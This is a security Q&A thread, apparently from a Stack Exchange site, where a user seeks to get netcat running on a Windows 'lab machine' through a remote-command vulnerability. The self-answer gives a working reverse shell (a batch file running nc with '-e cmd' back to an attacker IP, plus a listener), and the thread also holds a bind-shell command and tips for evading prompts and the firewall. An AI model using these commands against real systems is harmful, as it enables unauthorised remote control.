I need to run a netcat on a remote lab machine. I can execute remote commands through the browser with Administrator rights (because of the application vulnerability) but I don't have access to the machine itself.

I uploaded nc.exe to a remote server but it doesn't work, most likely due to Windows asking if it's OK to run unknown software, but there is no one to click "Allow".

So I tried to use exe2bat software, but I think I did something wrong when I did the conversion.

This is the command that should be working for me: nc.exe -lvp 7777 -e cmd.exe
Conversion: exe2bat nc.exe nc.bat
Execution: nc.bat -lvp 7777 -e cmd.exe

Can you advise why it doesn't work for me or what I am doing wrong, or if there is any other, better exe-to-bat converter?

Dranik
  • Can you compile and run netcat or a similar script on the remote machine? If you can't upload the file you want, you could simply build it on the remote machine. – schroeder Dec 30 '15 at 19:28
  • Are you saying that if I use exe2bat on one machine, then upload the bat file to another machine, it might not work? So I should do the exe2bat conversion on the target machine in the first place? – Dranik Dec 30 '15 at 19:50
  • I mean, copy the code of netcat over to the remote machine and compile it there. It should not give the warning about being unknown software because that machine created it. There are also other versions of nc that are in various scripting languages that you could use instead (python, powershell, etc.) – schroeder Dec 30 '15 at 20:16
  • I'll look into Powercat. Compiling might not be a good option since the remote server doesn't have any compilers installed on it (such as Python, C, or anything else) and it appears to be a Windows 2008 Server. Unless there are compilers that do not require any installation and are trusted by the system. Thanks for the hint. – Dranik Dec 30 '15 at 20:54
  • It's most likely the Windows firewall. Try the netcat clone, sbd. Also, what happens if you try port 443 instead of 7777? – 16b7195abb140a3929bbc322d1c6f1 Dec 30 '15 at 21:39
  • sbd and the PowerShell script were all asking for permission to run unknown software. – Dranik Jan 05 '16 at 14:27

1 Answer

I had to upload nc.exe and nc2.bat to bypass the "Unknown software" security warning.
nc2.bat content to initiate the connection from inside and avoid the firewall security prompt:

    @echo on
    c:\%path_to_nc%\nc -nv %LINUX_IP% 4466 -e cmd

  1. Then set up a listener on the Linux IP

    nc -nlvp 4466

  2. Execute the remote command calling for nc2

This way I got a command prompt from the Windows box right away.

Dranik